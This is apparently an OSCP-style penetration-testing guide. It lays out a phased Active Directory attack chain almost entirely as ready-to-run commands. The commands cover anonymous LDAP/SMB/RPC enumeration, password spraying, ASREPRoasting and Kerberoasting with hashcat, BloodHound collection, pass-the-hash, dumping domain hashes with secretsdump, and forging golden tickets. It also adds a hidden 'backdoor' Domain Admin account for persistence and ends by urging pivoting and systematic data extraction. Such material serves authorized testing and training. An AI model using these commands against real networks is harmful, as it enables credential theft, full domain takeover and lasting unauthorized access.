Active Directory Attack Chain

Systematic approach to AD compromise using individual service templates

Environment Setup

export IP=10.10.10.10
export DOMAIN=domain.local
export DC_IP=$IP
export BASE_DN="DC=domain,DC=local"

Phase 1: Initial AD Discovery

Identify Domain Environment

# Check if target is domain-joined
nmap -p 88,389,636,3268,3269 $IP

# Domain name discovery
nslookup $IP
dig -x $IP

# NetBIOS name discovery
nbtscan $IP
nmblookup -A $IP

Determine Attack Priority

Based on discovered services, follow this attack chain:

Priority 1: Anonymous/Null Access

• LDAP (389/636) → 389,636 LDAP(S)
• SMB (139/445) → 139,445 SMB
• RPC (135) → 135 WMI,MSRPC

Priority 2: Authentication Required

• Kerberos (88) → 88 Kerberos
• WinRM (5985/5986) → 5985, 5986 WinRM

Phase 2: Anonymous Enumeration Chain

Step 1: LDAP Anonymous Bind

# Test anonymous LDAP access first
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=*)" | head -20

# If successful, extract critical info
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=user)" sAMAccountName | grep sAMAccountName | cut -d: -f2 | sort > users.txt
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=computer)" dNSHostName | grep dNSHostName | cut -d: -f2 | sort > computers.txt

Step 2: SMB Null Sessions

# Test SMB null sessions
netexec smb $IP -u '' -p '' --shares
netexec smb $IP -u 'guest' -p '' --shares

# If successful, enumerate further
enum4linux-ng -A $IP

Step 3: RPC Null Sessions

# Test RPC anonymous access
rpcclient -U "" -N $IP
# If connected, run: enumdomusers, enumdomgroups, querydominfo

Phase 3: Credential-Based Attacks

Password Spraying Campaign

Using discovered usernames from Phase 2:

# Common AD passwords to test
echo "Password123!" > passwords.txt
echo "Welcome123!" >> passwords.txt
echo "Summer2024!" >> passwords.txt
echo "Spring2024!" >> passwords.txt
echo "company2024!" >> passwords.txt

# Spray across multiple protocols
netexec smb $IP -u users.txt -p passwords.txt --continue-on-success
netexec ldap $IP -u users.txt -p passwords.txt --continue-on-success
netexec winrm $IP -u users.txt -p passwords.txt --continue-on-success

Kerberos Pre-Authentication Attacks

# ASREPRoast (no credentials required)
impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile users.txt

# If ASREPRoastable users found
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

Phase 4: Authenticated Enumeration

Once you have valid credentials (user:password):

Enhanced Domain Enumeration

# Set credentials for reuse
export CREDS="username:password"

# Comprehensive LDAP enumeration
netexec ldap $IP -u username -p password --users --groups --computers
netexec ldap $IP -u username -p password --password-policy

# Kerberoasting
impacket-GetUserSPNs $DOMAIN/$CREDS -dc-ip $DC_IP -request
netexec ldap $IP -u username -p password --kerberoasting kerb_hashes.txt

BloodHound Data Collection

# Collect AD data for analysis
bloodhound-python -d $DOMAIN -u username -p password -gc $DC_IP -c all

# Alternative: SharpHound on target
# Transfer SharpHound.exe to target, then:
# .\SharpHound.exe -c All -d $DOMAIN

Phase 5: Lateral Movement

WinRM Access Testing

# Test WinRM with discovered credentials
netexec winrm $IP -u $CREDS
evil-winrm -i $IP -u username -p password

Pass-the-Hash Preparation

# If you obtain NTLM hashes, test across domain
netexec smb $IP -u username -H ntlm_hash
netexec winrm $IP -u username -H ntlm_hash

Service Account Exploitation

# If Kerberoastable service accounts found
hashcat -m 13100 kerb_hashes.txt /usr/share/wordlists/rockyou.txt

# Test cracked service account credentials
netexec smb $IP -u service_account -p cracked_password --shares

Phase 6: Domain Privilege Escalation

High-Value Target Identification

From BloodHound analysis, look for:

• Users with DCSync rights
• Computers with unconstrained delegation
• Service accounts with admin privileges
• Shortest path to Domain Admins

Common Escalation Vectors

Unconstrained Delegation

# If computer has unconstrained delegation
# Force authentication to compromised computer
# Extract TGT tickets for privilege escalation

Weak ACLs

# Look for users with GenericAll/WriteDacl on high-value objects
# Use PowerView or BloodHound to identify paths

Group Policy Abuse

# Check for GPP passwords (older domains)
impacket-Get-GPPPassword -xmlfile Groups.xml

# Look for writable GPO paths

Phase 7: Domain Compromise

Domain Admin Access

Once you achieve Domain Admin equivalent access:

# Verify domain admin privileges
net group "Domain Admins" /domain

# Extract domain hashes
impacket-secretsdump $DOMAIN/$CREDS@$DC_IP

# Golden ticket creation (if krbtgt hash obtained)
impacket-ticketer -nthash krbtgt_hash -domain $DOMAIN -domain-sid domain_sid administrator

Persistence Mechanisms

# Create persistent domain admin access
net user backdoor P@ssw0rd123 /add /domain
net group "Domain Admins" backdoor /add /domain

# Golden ticket persistence
# DCSync persistence via AdminSDHolder

Attack Chain Decision Tree

If Anonymous Access Succeeds

1. Extract all users/computers from LDAP
2. Test password spraying immediately
3. Check for ASREPRoastable users
4. Proceed to authenticated phase

If Anonymous Access Fails

1. Focus on Kerberos attacks (ASREPRoast with guessed usernames)
2. Test default credentials on discovered services
3. Look for other attack vectors (web apps, other services)

If Password Spraying Succeeds

1. Immediately run BloodHound collection
2. Test for Kerberoastable accounts
3. Check WinRM access for shell
4. Analyze attack paths with BloodHound

If Service Account Compromised

1. Check for admin privileges on other systems
2. Look for delegation opportunities
3. Test for SPN permissions abuse

Common AD Attack Combinations

LDAP → Kerberos → WinRM Chain

# 1. Anonymous LDAP enumeration
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=user)" sAMAccountName

# 2. ASREPRoast discovered users
impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile users.txt

# 3. Crack hashes and test WinRM
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
evil-winrm -i $IP -u user -p cracked_password

SMB → RPC → Lateral Movement

# 1. SMB null session enumeration
netexec smb $IP -u '' -p '' --shares --users

# 2. RPC enumeration for additional users
rpcclient -U "" -N $IP
enumdomusers

# 3. Password spray and lateral movement
netexec smb subnet_range -u discovered_users -p common_passwords

Time Management for AD Attacks

First 30 Minutes

• Anonymous enumeration across all AD services
• User list compilation from multiple sources
• Password spraying with top 5 common passwords

Next 30 Minutes

• ASREPRoasting discovered users
• Kerberoasting if credentials obtained
• BloodHound collection if authenticated

Ongoing

• Hash cracking in background
• Lateral movement testing
• Privilege escalation path analysis

Success Indicators

Low Privilege Success

• Valid domain credentials obtained
• WinRM/RDP access to domain system
• BloodHound data collected

High Privilege Success

• Service account with elevated privileges
• Local admin on domain controller
• Domain admin equivalent access

Next Steps After AD Compromise

1. Document all credentials and access
2. Establish persistence via multiple methods
3. Pivot to other network segments
4. Extract sensitive data systematically

Resources

• BloodHound Usage Guide
• Impacket Examples
• AD Attack Methodology
• Emmanuel Solis OSCP Guide - AD attack chain methodology